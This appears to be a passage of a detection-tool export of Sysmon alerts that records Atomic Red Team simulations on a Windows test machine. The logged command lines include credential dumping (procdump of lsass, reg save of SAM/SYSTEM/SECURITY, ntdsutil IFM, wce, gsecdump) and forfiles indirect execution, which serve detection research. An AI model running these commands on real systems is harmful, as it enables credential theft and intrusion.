( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "ntdsutil â€œac i ntdsâ€ â€œifmâ€ â€œcreate full C:\Atomic_Red_Team q q" ),1," 1 5 4 1 0 0x8000000000000000 4126 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.845 747F3D96-DD9E-5D31-0000-001059374B00 584 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "ntdsutil â€œac i ntdsâ€ â€œifmâ€ â€œcreate full C:\Atomic_Red_Team q q" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549086.852817,2019-07-19T19:11:26.852817+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4125 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.673 747F3D96-DD9E-5D31-0000-00109A2F4B00 264 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ) contain suspicious command ( procdump.exe),1," 1 5 4 1 0 0x8000000000000000 4124 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.626 747F3D96-DD9E-5D31-0000-00106E2C4B00 5488 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ),1," 1 5 4 1 0 0x8000000000000000 4124 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.626 747F3D96-DD9E-5D31-0000-00106E2C4B00 5488 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549086.642464,2019-07-19T19:11:26.642464+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4123 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.535 747F3D96-DD9E-5D31-0000-0010CB274B00 3016 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549083.336763,2019-07-19T19:11:23.336763+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" ),1," 1 5 4 1 0 0x8000000000000000 4121 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:23.302 747F3D96-DD9B-5D31-0000-00106C1C4B00 7164 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549081.105496,2019-07-19T19:11:21.105496+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" ),1," 1 5 4 1 0 0x8000000000000000 4119 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:21.069 747F3D96-DD99-5D31-0000-001069A34A00 4080 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549077.243643,2019-07-19T19:11:17.243643+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" ),1," 1 5 4 1 0 0x8000000000000000 4117 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:17.211 747F3D96-DD95-5D31-0000-001075964A00 7140 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549077.224751,2019-07-19T19:11:17.224751+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4116 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:17.139 747F3D96-DD95-5D31-0000-0010D6914A00 6264 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1003] Credential Dumping - Process,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1," 1 5 4 1 0 0x8000000000000000 4115 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:17.097 747F3D96-DD95-5D31-0000-0010B38E4A00 5216 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1," 1 5 4 1 0 0x8000000000000000 4115 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:17.097 747F3D96-DD95-5D31-0000-0010B38E4A00 5216 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549077.107912,2019-07-19T19:11:17.107912+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4114 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:17.016 747F3D96-DD95-5D31-0000-0010148A4A00 5476 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1003] Credential Dumping - Process,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1," 1 5 4 1 0 0x8000000000000000 4113 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:16.975 747F3D96-DD94-5D31-0000-0010F4864A00 3920 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "gsecdump -a" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1," 1 5 4 1 0 0x8000000000000000 4113 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:16.975 747F3D96-DD94-5D31-0000-0010F4864A00 3920 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "gsecdump -a" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1563549076.48799,2019-07-19T19:11:16.487990+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4111 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-19 15:11:03.652 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49744 false 151.101.0.133 443 https ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," 1 5 4 1 0 0x8000000000000000 4110 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:07.987 747F3D96-DD8B-5D31-0000-001094584A00 5792 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /user C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," 1 5 4 1 0 0x8000000000000000 4110 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:07.987 747F3D96-DD8B-5D31-0000-001094584A00 5792 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /user C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1," 1 5 4 1 0 0x8000000000000000 4108 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:09:59.829 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell c:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-DD37-5D31-0000-00109D4C4900 5632 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1," 1 5 4 1 0 0x8000000000000000 4108 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:09:59.829 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell c:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-DD37-5D31-0000-00109D4C4900 5632 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548999.931135,2019-07-19T19:09:59.931135+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 4107 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:09:43.301 747F3D96-DD37-5D31-0000-00109D4C4900 5632 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D4B8-5D31-0000-0010A8CE0600 4416 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1563548980.973075,2019-07-19T19:09:40.973075+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4105 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-19 14:57:52.847 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49734 false 151.101.0.133 443 https ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548278.359021,2019-07-19T18:57:58.359021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4104 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:55.181 747F3D96-DA73-5D31-0000-001061933F00 1724 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1563548275.236766,2019-07-19T18:57:55.236766+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe ),1," 1 5 4 1 0 0x8000000000000000 4103 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:55.056 747F3D96-DA73-5D31-0000-0010918F3F00 4092 C:\Windows\System32\forfiles.exe 10.0.17763.1 (WinBuild.160101.0800) ForFiles - Executes a command on selected files Microsoft® Windows® Operating System Microsoft Corporation forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 747F3D96-DA73-5D31-0000-00106A8D3F00 1052 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548275.138826,2019-07-19T18:57:55.138826+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe ),1," 1 5 4 1 0 0x8000000000000000 4102 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:55.024 747F3D96-DA73-5D31-0000-00106A8D3F00 1052 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1563548274.165319,2019-07-19T18:57:54.165319+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," 1 5 4 1 0 0x8000000000000000 4100 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:54.123 747F3D96-DA72-5D31-0000-001056513F00 3680 C:\Windows\System32\forfiles.exe 10.0.17763.1 (WinBuild.160101.0800) ForFiles - Executes a command on selected files Microsoft® Windows® Operating System Microsoft Corporation forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High 